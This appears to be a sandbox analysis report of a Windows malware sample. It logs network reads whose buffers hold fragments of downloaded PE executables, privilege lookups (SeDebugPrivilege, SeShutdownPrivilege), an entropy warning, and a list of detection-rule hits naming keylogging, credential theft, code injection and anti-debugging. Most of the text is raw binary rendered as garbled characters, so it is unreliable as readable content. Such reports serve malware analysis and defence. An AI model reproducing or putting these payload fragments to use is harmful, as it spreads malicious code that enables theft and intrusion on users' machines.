ÚùÿÿéXúÿÿ‹¢Ç{ÿ¯û@öÇA¹DL>\DD̓=‹Ç DLÍAùû¶I £ùÿÿé!úÿÿA¹ÆûJAùû¶I ‹ùÿÿé úÿÿH‹\$8A¹3.Ž‚Aùû¶I nùÿÿéìùÿÿ‰t$`‰T$d‹=.Ǎ_ÿ¯ßöÃA¹2«W¿R»ýéùÿÿ‹Ç{ÿ¯û@öÇA¹"Øt¼¿›“éûøÿÿH‹\$@HƒûA¹ðB翔³þ1DLÏAùû¶I ýøÿÿé{ùÿÿ‹\$0‹|$d9ßœD$7‹¶Æ{ÿ¯û@öÇA¹2«W¿ãÃ[ 颸ÿÿA¹,RÆdAùû¶I
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL ƒ›~gà p p˜  @Ð @@p qP ì°   „  ÔR \` ¤.textV X  `.itext@p \ `.data88 :t @À.bssxrÐ À.idataìP ® @À.didata¤` ¾ @À.edataqp À @@.tls€ À.rdata]  @@.reloc„   Ä @B.rsrc° Ò @@Ð ä @@@Boolean@FalseTrueSystem4@AnsiCharÿP@ Charÿÿh@ShortInt€ÿÿÿ„@SmallInt€ÿÿÿ @Integer€ÿÿÿ¸@ByteÿÐ@Wordÿÿè@Cardinalÿÿÿÿ@Pointer@Int64€ÿÿÿÿÿÿÿ8@UInt64ÿÿÿÿÿÿÿÿX@ NativeInt€ÿÿÿt@ NativeUIntÿÿÿÿ@Single @Extended´@DoubleÄ@CompÔ@Currencyè@ ShortStringÿü@ PAnsiChar0@@ PWideCharL@,@ByteBool€ÿÿÿ(@FalseTrueSystem\@WordBool€ÿÿÿX@FalseTrueSystemŒ@LongBool€ÿÿÿˆ@FalseTrueSystem¼@stringÌ@ WideStringà@ AnsiStringô@ Variant@ OleVariant@TClassœ@,@HRESULT€ÿÿÿD@TGUIDä@D1Ì@D2Ì@D3D4 @v@ &op_Equality@@@Left@@Right (œJ&op_Inequality@@@Left@@Right (œJEmpty@@ (œJCreate@@Data@ BigEndian (œJCreate@@´@Dataä@ AStartIndex@ BigEndian(œJIsEmpty@¤@PInterfaceEntry¼@À@TInterfaceEntry@@IID@VTableœ@IOffsetp@ ImplGetter0@PInterfaceTableH@L@TInterfaceTableÄEœ@ EntryCountEntriesœ@TMethod@Code@Data (œJ &op_Equality@˜@Left˜@Right (œJ&op_Inequality@˜@Left˜@Right (œJ&op_GreaterThan@˜@Left˜@Right (œJ&op_GreaterThanOrEqual@˜@Left˜@Right (œJ &op_LessThan@˜@Left˜@Right (œJ&op_LessThanOrEqual@˜@Left˜@Right|@ @|@’@ø~@@ð€@è€@@ @@@Œ}@¤}@Ø}@"š@DôÿÀ@Bôÿä@Bôÿ @CôÿK@Bôÿz@Bôÿ£@Côÿ×@Côÿ@Côÿ;@Côÿd@Côÿ@CôÿÌ@Côÿ@CôÿB@Côÿˆ@CôÿÅ@Bôÿÿ@Bôÿ9@Bôÿ@Côÿ½@Côÿî@Côÿ!@CôÿU@Jõÿˆ@Jöÿ³@J÷ÿæ@JøÿA@Jùÿr@Júÿ£@JûÿÜ@Jüÿ@KýÿF@Jþÿr@MÿÿTObject&¸}@Createœ@Self$è}@Freeœ@Self)(œJ DisposeOfœ@Self>ô}@ InitInstanceœ@Self@Instance/”~@CleanupInstanceœ@Self)(œJ ClassType@œ@Self4l}@ ClassName¸@Self@¸@9€}@ ClassNameIs@Self¸@Name+(œJ ClassParent@Self)(œJ ClassInfo@Self,(œJ InstanceSizeœ@Self<Ԁ@ InheritsFrom@Self@AClass;<@ MethodAddress@Selfä@Name;¬@ MethodAddress@Self¸@NameFԁ@ MethodName¸@Self@Address@¸@=(œJQualifiedClassName¸@Self@¸@: ‚@ FieldAddress@œ@Selfä@Name:
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELr:hà Ô’0K@`Kÿ3@€WàkÐðøá ÀÆ@à.rsrcðÐÖ@À.idata àØ@À +ðÚ@àbdozedic0ð00Ü@ànrtpbldi K @à.taggant00K"@à
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† |%hð" èx˜@paz`pž(`ð(&pœ @X¡À.textšçè `.rdataŒÂÄð@@.data8,д@À.pdataÄ@@.OLM à `.gxfgp0æ@@.retplneŒPü_RDATAô`þ@@.relocœp@B.bssh€h@À.bsshð hp @À.rsrcð`Ø@@AWAVAUATVWUSHƒìx‰ÖH‰ÏH‹äÁH1àH‰D$p3qèH‰D$(H‹GH‰ÁHÁé‰L$0ƒàA¹Ȫ&1ÒA¼mÊ¥ˆAº•L3A»ñ«l½,RÆd¹n{™A¾€]æ]Aùû¶I Géŋ΍{ÿ¯û@öÇA¹¿é' ¿/™ßrDDσ=óÍ DLÏf.„Aùû¶I ŽƒAù˜®LŽ&Aù+RÆdŽAùð«lwAù,RÆd„ÀAùÕ"hi„êAùÁžßiu©‹ƒÍ{ÿ¯û@öÇA¹Ÿ‰ÌDDɃ=lÍ DLÉAùû¶I ˆf.„AùߴяAù0Ñ«ŽAùÚvÌ»RAù1Ñ«„«AùA­®„¶AùoϤµ…"ÿÿÿHc\$dH‹|$(i<Ÿ•éÑ[‰ûÁë1ûiەéÑ[i|$`•éÑ[1߉|$L‹\$dƒÃ‰\$P‹Å̍{ÿ¯û@öÇA¹É¦…n¿¯çÞÓé±þÿÿf.„AùȪ&ޱAù”L3öAùȪ&„=Aùgù3'„WAù”³þ1…þÿÿH‹\$@HƒûA¹×2<å¿ÛvÌ»DDÏE1íAùû¶I dþÿÿéâþÿÿfAù“d†èŽAùõr㠏ÍAù”d†è„AùR»ý„1Aù›“…þÿÿH‹\$8¾3\$liەéÑ[3\$`‰\$\‹Ïˍ{ÿ¯û@öÇA¹"Øt¼¿7qÞé»ýÿÿAùCL>\ŽËAùDL>\„ÿAù€]æ]„ Aù™äc…¡ýÿÿH‹\$8¾[Áã3\$h‰\$X‹gˍ{ÿ¯û@öÇA¹»¬>ˆEDʃ=PË ELÊAùû¶I hýÿÿéæýÿÿAùlÊ¥ˆކAùmÊ¥ˆ„ÏAùn{™„ßAùÈèOª…"ýÿÿ‹üʍ{ÿ¯û@öÇA¹É¦…n¿oϤµéèüÿÿAù¢Ž}Aù ¢„¸Aù7qÞ„¦üÿÿAùŸ‰Ì…ÎüÿÿA¹ÁžßiAùû¶I ÈüÿÿéFýÿÿAùL‡ÞŽpAùM‡Þ„ŒAù×2<å„°AùðBç…‚üÿÿH‹\$@HƒûA¹ ¢»‡‘ì DLËE1ÀAùû¶I güÿÿéåüÿÿAùñ«l„†Aùɦ…n„–Aù/™ßr….üÿÿ‹Ê{ÿ¯û@öÇA¹ü¶I ED΃=ñÉ ELÎAùû¶I  üÿÿé‡üÿÿAùÛvÌ»„ºAù"Øt¼„ÒAùè ÒÀ…Ðûÿÿ‹ªÉ{ÿ¯û@öÇA¹M‡Þ¿!¥>é–ûÿÿAù•L3„ñAù!¥>„AùÆûJ…‰ûÿÿ‹cɍ{ÿ¯û@öÇA¹1Ñ«¿örã éOûÿÿAùörã „ÿAùãÃ[ „ Aù¿é' …BûÿÿH‹\$8‹\$l‹\$l‹\$l‹\$l‹\$l‹\$l‹\$l‹\$l‹\$l‹\$`A¹gù3'Aùû¶I ûÿÿéûÿÿAù™®L„9Aù2«W…ãúÿÿ‹\$0‹\$dA¹R»ýAùû¶I ÕúÿÿéSûÿÿAù3.Ž‚„—Aù»¬>ˆ…©úÿÿH‹\$8‹\$h‹\$h‹\$h‹\$h‹\$hA¹™äcAùû¶I ŠúÿÿéûÿÿAùü¶I „|Aù‡‘ì …^úÿÿD‰D$h‹3ȍ{ÿ¯û@öÇA¹Ÿ‰Ì¿ÁžßiéúÿÿAùà´Ñ„UAù¯çÞÓ…úÿÿ‹t$L‹T$PA¹Ȫ&Aùû¶I úÿÿéúÿÿ‹ÙǍ{ÿ¯û@öÇA¹DL>\ED˃=ÂÇ ELËAùû¶I ÚùÿÿéXúÿÿ‹¢Ç{ÿ¯û@öÇA¹DL>\DD̓=‹Ç DLÍAùû¶I £ùÿÿé!úÿÿA¹ÆûJAùû¶I ‹ùÿÿé úÿÿH‹\$8A¹3.Ž‚Aùû¶I nùÿÿéìùÿÿ‰t$`‰T$d‹=.Ǎ_ÿ¯ßöÃA¹2«W¿R»ýéùÿÿ‹Ç{ÿ¯û@öÇA¹"Øt¼¿›“éûøÿÿH‹\$@HƒûA¹ðB翔³þ1DLÏAùû¶I ýøÿÿé{ùÿÿ‹\$0‹|$d9ßœD$7‹¶Æ{ÿ¯û@öÇA¹2«W¿ãÃ[ 颸ÿÿA¹,RÆdAùû¶I
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $DØþe¹6¹6¹6ҕ7¹6ғ7¹6Ҕ7¹6ґ7¹6¹‘6 ¹6Ҙ7 ¹6Òo6¹6Ғ7¹6Rich¹6PEd†øÄ®ð" |‚@ àÌ`Á <¢´ðLÑàÐ šT(‘ .text€{| `.rdataÈ"$€@@.dataÀ¤@À.pdataà¨@@.rsrcàðÒ®@@.reloc Ѐ@BÌÌÌÌÌÌÌÌE3ÉHBÿAºþÿÿA»W€I;ÂEGËE…ÉxGH…Òt"L+ÒL+ÁIH…ÀtAŠ„Àt ˆHÿÁHƒêuäH…ÒHAÿHEÁH÷ÚEÉA÷ÑAáz€ÆëH…ÒtÆA‹ÁÃÌÌÌÌÌÌÌÌÌÌE3ÉL‹ÒM‹ØH‹ÑA¸W€IBÿH=þÿÿEGÈE…Éx5I‹ÊH‹ÂM…Òt€8t HÿÀHƒéuòH‹ÁH÷ØEÉA÷ÑE#ÈH…ÉtM‹ÂL+ÁëE3ÀE…ÉxXI‹ÊII+Èt.H‹ÁMˆþÿÿI+ÂLÈL+ÚM…ÉtAŠ„ÀtˆIÿÉHÿÂHƒéuåH…ÉHBÿHEÂH÷ÙEÉA÷ÑAáz€ÆA‹ÁÃÌÌÌÌÌÌÌÌÌÌL‰D$L‰L$ SVWHƒì 3ÿHBÿH=þÿÿH‹ñ¹W€Gù…ÿx;HZÿH‹ÎH‹ÓLL$X3ÿHÿ˜„D…ÀxH˜H;Ãwu@ˆ<3ë@ˆ<3¿z€ëH…ÒtÆ‹ÇHƒÄ _^[ÃÌÌÌÌÌÌÌH‰\$H‰l$VWAVHì€H‹ ®H3ÄH‰D$pL‹ñfÇD$l3íH …‹ý‰l$hHÿ€DH‹ØH…À„šHð„H‹ÈHÿ.€DH‹ðH…ÀtmHD$`A‰.H‰D$PDE ‰l$HHL$h‰l$@}‰l$8A¹ ‰l$0²‰l$(‰l$ Hÿñ~D…Àt$H‹T$`M‹Æ3ÉH‹ÆÿµƒH‹L$`Hÿ¡~DH‹ËHÿÊD‹ÇH‹L$pH3Ìè¦qLœ$€I‹[(I‹k0I‹ãA^_^ÃÌÌÌÌÌÌÌÌÌÌH‹ÄH‰XH‰pH‰xL‰p UHh¡HìH‹ö¬H3ÄH‰EG‹-®E3öD‰u?fÇECD‰u'A^;Ã…’HM'è‡þÿÿ…À…hHÿŒ€DH‹ÈLE/SHÿæ}D…À„WH‹M/HE+E3ÉH‰D$ E3À‹ÓHÿ•}D…À…HÿY~Dƒøz…ë‹U+3ÉHÿ€DH‹øH…À„ÎD‹M+HE+H‹M/L‹Ç‹ÓH‰D$ Hÿ9}D…À„•HE7A¹ H‰D$PHM?D‰t$HA¸ D‰t$@ŠÓD‰t$8D‰t$0D‰t$(D‰t$ Hÿ4}D…ÀtLA‹öD97v4»H‹U7‹ÎHÉH‹LÏHÿ}D…Àuó;7rÜë ‰ά‰]'H‹M7Hÿ¼|DH‹ÏHÿÕ}DH‹M/Hÿ}D‹E'ë‹ ‘¬»‹E'…ÀEˉ ~¬H‹MGH3Ìè–oLœ$I‹[I‹sI‹{ M‹s(I‹ã]ÃÌÌÌÌÌÌÌÌÌH‰\$WHì0H‹ôªH3ÄH‰„$ I‹ùI‹ÀH‹Ùêt'ƒúuIÀÃ÷ÿÿIƒøwH‹ÐHÿôDëh3ÀëiHÿ €DH‹ÐH‹Ëèú6H‹ ûÈLD$ A¹ÆD$ ‹×Hÿ¢DLD$ º?H‹ËHÿ±DƒÉÿHÿ’D¸H‹Œ$ H3Ìè nH‹œ$HHÄ0_ÃÌÌÌÌÌÌÌH‰\$H‰l$H‰t$WHƒì H‹H‹òH‹ù3íë@8+tjHÿþH‹ÎèÌfH…Àuè¾H‹ÎH‰è¹fH…ÀuH‹û€?tHÿÇH‹ÎÿžèœfH…ÀtæHcÅHÀ8tÆHÿÀH‹\$0H‹l$8H‹t$@HƒÄ _ÃÌ3ÀëæÌÌÌÌÌÌÌÌH‰\$UVWATAUAVAWH¬$úÿÿHìpH‹^©H3ÄH‰…`L‹ñHEPM‹ÖHMPL+ÐM‹ùE3íM‹àºH‚úþÿH…ÀtAŠ „Àt ˆHÿÁHƒêuáH…ÒHAÿHEÁDˆ(€}P"u H#€HEQë H€HEPHL$0H‰D$0è»þÿÿH‹|$0HƒËÿH‹ðH…ÿtlH‹ÃHÿÀD8,u÷HƒørZŠG±\<:u8Ot8uH:ÁuDHD$@L‹ÇL+ÀHL$@ºH‚úþÿH…ÀtAŠ„Àt ˆHÿÁHƒêuáH…ÒHAÿHEÁDˆ(ëZA¹LY¾HD$@A‹ÑL+ÀHL$@H‚úþÿH…ÀtAŠ„Àt ˆHÿÁHƒêuáH…ÒHAÿL‹ÇA‹ÑHEÁHL$@Dˆ(è¤cº.H‹ÏèWeH…À„H ‰\$(ºH‰L$ D‹ËL‹ÀJ~Hÿ¹yDƒø…ÎHL$@Hÿ¯yDƒøÿ„ŒÁè÷Ѓà„~HÄ~H‰t$0HL$0è]ýÿÿH‹ÈH…Àt"D8)H§~H‹D$0HEÁHL$0H‰D$0è3ýÿÿº¹@Hÿ{DH‹ØH…À„ËH‹t$0H=E¨H‹ÏLL$@HV~D8.HEÎE3ÀHÿ•yDL‹ËAlj(¼Lá}HD$@H‰D$(H ~H )~ÇD$ HÿZyD…Àt5ƒ źD8.I‹ÎHEþL‹Çè›öÿÿLD$@ºH‹Ëè‰öÿÿéMƒ%ÙÄûfD9-åÄu%A¸HT$@HL$@L5¼}HÿEzDëL5·}D8.HD$@H‰D$(L§HEþM‹ÎºH‰|$ H‹Ëè^÷ÿÿéÞE3ÉLD$@º%D‰l$(3ÉÇD$ è¸33À鿺.H‹Ïè@cH…À„šHP}‰\$(H‰T$ D‹ËºL‹ÀJ~Hÿ¢wDƒøukH5ѦH‹ÃHÿÀD8,u÷HL$@HÿÃD8,u÷H<¹@HWHÿ3yDH‹ØH…ÀuE3ɺµE3ÀéNÿÿÿLL$@L‹ÆHWH‹Èè†öÿÿ鿹@‹×HÿêxDH‹ØH…Àt·HL$@HÿwDƒøÿt}¨uyLD$@‹×H…`L+ÀH`H‚þûÿH…ÀtBŠ„Àt ˆHÿÁHƒêuáH…ÒHAÿHEÁDˆ(H…ötmD8.thLÙ{H‹×H`èõÿÿL‹ÆH`H‹×èõÿÿë>H…`L+ðH•`H‡þûÿH…ÀtBŠ2„Àt ˆHÿÂHƒïuáH…ÿHJÿHEÊDˆ)L‹ÃDˆ+H‹ÓH`è›I‰$¸H‹`H3Ìè‡hH‹œ$¸HÄpA_A^A]A\
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ö¶BS’×,’×,’×,†¼/Ÿ×,†¼)(×,À¢(€×,À¢/„×,À¢)Ë×,£‹Ñ×,†¼(…×,†¼-×,’×-b×,^¢%“×,^¢Ó“×,^¢.“×,Rich’×,PEL÷áhà Úâ:Œð@@°È à°ðAüÀ8Â8Á@ð0.textúÙÚ `.rdatax8ð:Þ@@.dataôc0"@À.rsrcà :@@.relocðA°B<@Bhà²DèšyYÃÌÌÌÌh€²DèŠyYÃÌÌÌÌj hÔ¯E¹d>FèOh@³DèiyYÃÌÌÌj hø¯E¹”DFè/h ³DèIyYÃÌÌÌjh°E¹TEFèh´Dè)yYÃÌÌÌj h$°E¹´?Fèïh`´Dè yYÃÌÌÌjhH°E¹LDFèÏhÀ´DèéxYÃÌÌÌjh\°E¹Œ=Fè¯h µDèÉxYÃÌÌÌjh{®E¹$EFèh€µDè©xYÃÌÌÌjh{®E¹„EFèohàµDè‰xYÃÌÌÌjh{®E¹Ì?FèOh@¶DèixYÃÌÌÌjh{®E¹=Fè/h ¶DèIxYÃÌÌÌjh|°E¹>Fèh·Dè)xYÃÌÌÌjhˆ°E¹8HFèïh`·Dè xYÃÌÌÌjh”°E¹ÜDFèÏhÀ·DèéwYÃÌÌÌjh °E¹l<Fè¯h ¸DèÉwYÃÌÌÌjh¬°E¹|DFèh€¸Dè©wYÃÌÌÌj hÀ°E¹\@Fèohà¸Dè‰wYÃÌÌÌjDhаE¹ØGFèOh@¹DèiwYÃÌÌÌj\h±E¹T?Fè/h ¹DèIwYÃÌÌÌj hx±E¹t@FèhºDè)wYÃÌÌÌjhˆ±E¹ <Fèïh`ºDè wYÃÌÌÌjh±E¹„BFèÏhÀºDèévYÃÌÌÌj<h¬±E¹Ü;Fè¯h »DèÉvYÃÌÌÌj hì±E¹Ä;Fèh€»Dè©vYÃÌÌÌj hü±E¹€HFèohà»Dè‰vYÃÌÌÌjXh²E¹LAFèOh@¼DèivYÃÌÌÌjhl²E¹°HFè/h ¼DèIvYÃÌÌÌjh„²E¹DFFèh½Dè)vYÃÌÌÌjh²E¹ÀGFèïh`½Dè vYÃÌÌÌjhœ²E¹ä<FèÏhÀ½DèéuYÃÌÌÌjh¤²E¹TBFè¯h ¾DèÉuYÃÌÌÌjh¬²E¹DCFèh€¾Dè©uYÃÌÌÌjh´²E¹ÔCFèohà¾Dè‰uYÃÌÌÌjh¼²E¹<<FèOh@¿DèiuYÃÌÌÌjhIJE¹´EFè/h ¿DèIuYÃÌÌÌjh̲E¹|AFèhÀDè)uYÃÌÌÌjhÔ²E¹üBFèïh`ÀDè uYÃÌÌÌjhܲE¹ BFèÏhÀÀDèétYÃÌÌÌjhä²E¹xGFè¯h ÁDèÉtYÃÌÌÌjhì²E¹¤CFèh€ÁDè©tYÃÌÌÌjhô²E¹hHFèohàÁDè‰tYÃÌÌÌjhü²E¹<EFèOh@ÂDèitYÃÌÌÌjh³E¹Ì<Fè/h ÂDèItYÃÌÌÌjh ³E¹ü<FèhÃDè)tYÃÌÌÌj h(³E¹,=Fèïh`ÃDè tYÃÌÌÌj h8³E¹Ä>FèÏhÀÃDèésYÃÌÌÌjhH³E¹˜HFè¯h ÄDèÉsYÃÌÌÌjhP³E¹øHFèh€ÄDè©sYÃÌÌÌjhX³E¹ÌEFèohàÄDè‰sYÃÌÌÌjh`³E¹¨GFèOh@ÅDèisYÃÌÌÌjhh³E¹>Fè/h ÅDèIsYÃÌÌÌj ht³E¹(IFèhÆDè)sYÃÌÌÌj h„³E¹\=Fèïh`ÆDè sYÃÌÌÌjh”³E¹ì@FèÏhÀÆDèérYÃÌÌÌjhœ³E¹ì=Fè¯h ÇDèÉrYÃÌÌÌjh¤³E¹$?Fèh€ÇDè©rYÃÌÌÌjh¬³E¹dAFèohàÇDè‰rYÃÌÌÌjh´³E¹l?FèOh@ÈDèirYÃÌÌÌjh¼³E¹ HFè/h ÈDèIrYÃÌÌÌjhijE¹ EFèhÉDè)rYÃÌÌÌjhгE¹L>Fèïh`ÉDè rYÃÌÌÌjhسE¹DFèÏhÀÉDèéqYÃÌÌÌj hà³E¹4DFè¯h ÊDèÉqYÃÌÌÌjhð³E¹Ô@Fèh€ÊDè©qYÃÌÌÌjhø³E¹„<FèohàÊDè‰qYÃÌÌÌjh´E¹ÔFFèOh@ËDèiqYÃÌÌÌjh´E¹FFè/h ËDèIqYÃÌÌÌjh´E¹¼@FèhÌDè)qYÃÌÌÌjh´E¹HFèïh`ÌDè qYÃÌÌÌjh0´E¹¤@FèÏhÀÌDèépYÃÌÌÌjhD´E¹GFè¯h ÍDèÉpYÃÌÌÌjhd´E¹@Fèh€ÍDè©pYÃÌÌÌjhx´E¹|>FèohàÍDè‰pYÃÌÌÌjh´E¹dDFèOh@ÎDèipYÃÌÌÌjhœ´E¹ôAFè/h ÎDèIpYÃÌÌÌjh´´E¹@IFèhÏDè)pYÃÌÌÌjhÀ´E¹GFèïh`ÏDè pYÃÌÌÌjhØ´E¹T<FèÏhÀÏDèéoYÃÌÌÌjhì´E¹œ?Fè¯h ÐDèÉoYÃÌÌÌjhô´E¹”AFèh€ÐDè©oYÃÌÌÌjhµE¹Ü>FèohàÐDè‰oYÃÌÌÌjh$µE¹AFèOh@ÑDèioYÃÌÌÌjh0µE¹œBFè/h ÑDèIoYÃÌÌÌjh<µE¹¼FFèhÒDè)oYÃÌÌÌjhHµE¹4AFèïh`ÒDè oYÃÌÌÌjh\µE¹ðGFèÏhÀÒDèénYÃÌÌÌjhpµE¹IFè¯h ÓDèÉnYÃÌÌÌjhxµE¹lEFèh€ÓDè©nYÃÌÌÌj@h€µE¹ü?FèohàÓDè‰nYÃÌÌÌjhĵE¹lBFèOh@ÔDèinYÃÌÌÌjLhеE¹ÄAFè/h ÔDèInYÃÌÌÌj<h ¶E¹¤=FèhÕDè)nYÃÌÌÌj h`¶E¹ìCFèïh`ÕDè nYÃÌÌÌjhp¶E¹<BFèÏhÀÕDèémYÃÌÌÌjh|¶E¹¬AFè¯h ÖDèÉmYÃÌÌÌjhˆ¶E¹DFèh€ÖDè©mYÃÌÌÌ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† Slhð" 8Æ@ ã ``Ë(ð 0” (&€lÀ<@Έ.text  `.rdataÀ0¾@@.data0ðØ@À.pdata æ@@.gxfg0@@@_RDATAp@@.relocl€@B.jssxx@À.jssx x– @À.rsrcð@@AWAVAUATVWUSHìèH‹æáH1àH‰„$à‹uíhÿ¯è@öÅ”„$‚‹aí”Ãø œÀœ„$ƒؽi‡AG¸«ÚºDè‰l$|½á1¥Dè‰l$x½…Öæs¸Þ$1­Dè‰l$t½Éˆž¡Dè‰l$pA¸ ) ¸ù\¡âDDÀ½7.ÔâDè‰l$lA¹¢r.ü¸ò'áODDÈAº·}Á&DDнA tˆ¸hÛÎóDè‰l$h½Œnœ¡Dè‰l$dA¼’@¡F¸G®‡DDàA»ó7DDؽcæ°y¸5Î¥Dè‰l$`½„³YDè‰l$\½'R^¸–ÇRDè‰l$X‰T$TI‰Í¸­œ"A¾K¬1D‰D$DD‰L$@D‰T$<D‰d$8D‰\$4f.„A‰Ç=ò7~fAÿ–ÇRAÿá©°2ÕAÿ¬œ"ŽÒAÿ­œ"„“D‰ÈAÿ·}Á&t¶D‰øAÿW\-uª‹D$,‰„$À‹D$lë™f„AÿÀÙK¹#Aÿ‹nœ¡Ž£Aÿá1¥Ž•Aÿá1¥„SAÿ5Î¥„tD‰øAÿÞ$1­…?ÿÿÿH‹„$˜‹„$À‹„$À‹„$À‹„$À‹„$´‹„$´‹„$´‹„$´‹„$´‹„$´‹„$´‹„$´‹„$´¸Éˆž¡éÒþÿÿfAÿËʝmŽ$Aÿ_g•tŽ.Aÿ`g•t„æD‰ØAÿcæ°y„™þÿÿD‰øAÿУÞ~…‰þÿÿH‹„$ Hƒø¸ÁÙK¹¹ÁLüõLÁÇD$(écþÿÿAÿ6.ÔâŽÿAÿÀLüõŽðAÿÁLüõ„ÅAÿ¢r.ü„ÌD‰øAÿ¤ÜW…þÿÿ¸0“Ü‹Œ$´‰L$0éþÿÿAÿh‡AGŽëAÿi‡AG„¤D‰øAÿò'áO…Ýýÿÿ¸·}Á&éÓýÿÿAÿ@ tˆîAÿ¡i2„nD‰øAÿG®‡…©ýÿÿ¸ó7éŸýÿÿAÿ 'R^Aÿ–ÇR„D‰øAÿ„³Y…uýÿÿ‹„$‹Œ$¸9Áœ„$—‹D$`éTýÿÿAÿ0“܏ñAÿÁÙK¹„—D‰øAÿ«Úº…*ýÿÿ‹„$ċ„$ċ„$ċ„$ċ„$ĸá1¥éýüÿÿD‰àAÿó7„íüÿÿD‰øAÿ ) …Ýüÿÿ‹D$péÔüÿÿAÿŒnœ¡„AD‰øAÿɈž¡…·üÿÿH‹„$˜¾3„$ÀiÀ•éÑ[3„$´‰„$¬‹D$téˆüÿÿAÿÌʝm„D‰øAÿ…Öæs…küÿÿ¸0“Ü‹Œ$¬‰L$0éVüÿÿD‰ÀAÿ7.Ôâ„FüÿÿD‰øAÿhÛÎó…6üÿÿH‹„$˜‹„$¼‹„$¼‹„$¼¸Œnœ¡éüÿÿAÿâ©°2„ÀD‰øAÿ’@¡F…òûÿÿ€¼$—¸¡i2¹â©°2EÁéØûÿÿD‰ÐAÿA tˆ„ÈûÿÿD‰øAÿ¾‰cŽ…¸ûÿÿH‹„$ Hƒø¸¤ÜW¹W\-DÁÇD$,é’ûÿÿAÿ'R^„D‰øAÿ{¥°e…uûÿÿ‹D$$‰„$´‹D$ ‰„$¸‹D$\éVûÿÿAÿ0“Ü„qD‰øAÿù\¡â…9ûÿÿ¸7.Ôâé/ûÿÿŠ”$‚€¼$ƒ¸–ÇR¹`g•tEÁ„ÒEÁé ûÿÿ‹„$ÄÁè 3„$ÄiÀ•éÑ[‰ÁÁé1Á‰Œ$°‹D$|éÛúÿÿ‹„$‹„$¸¸„³YéÃúÿÿ‹ç‹ çpÿ¯ð@öÆ”À”„$߉L$Pƒù œÂœ„$ÈÂA»ÊÉDËEEÞA¿ÊÉD˸MŽ–ªDEø¿í@¬™¸âž¨EøI‹U¸Q¼¹Æf.„D=LŽ–ª~I=ÉÉDËb=MŽ–ª„|=Q¼¹Æuà¶œ$߀¼$ȸí@¬™¹CBEÁ„ÛEÁ=LŽ–ª¾€=K¬1tN=í@¬™tY=➨u›é"fD=ÊÉDËtP=CBu‚H‰”$Љø=LŽ–ªtÿÿÿë»D‰Ø=LŽ–ªdÿÿÿ뫸CB=LŽ–ªRÿÿÿë™D‰ø=LŽ–ªBÿÿÿ뉸MŽ–ª=LŽ–ª0ÿÿÿétÿÿÿ‹D$(‰„$¼‹D$dé`ùÿÿ
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x004aae00', u'virtual_address': u'0x0000c000', u'entropy': 7.995970593505949, u'name': u'.rsrc', u'virtual_size': u'0x004ab000'} entropy 7.99597059351 description A section with a high entropy has been found
entropy 0.993246051538 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
process system
url http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url http://purl.org/rss/1.0/
url http://www.passport.com
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
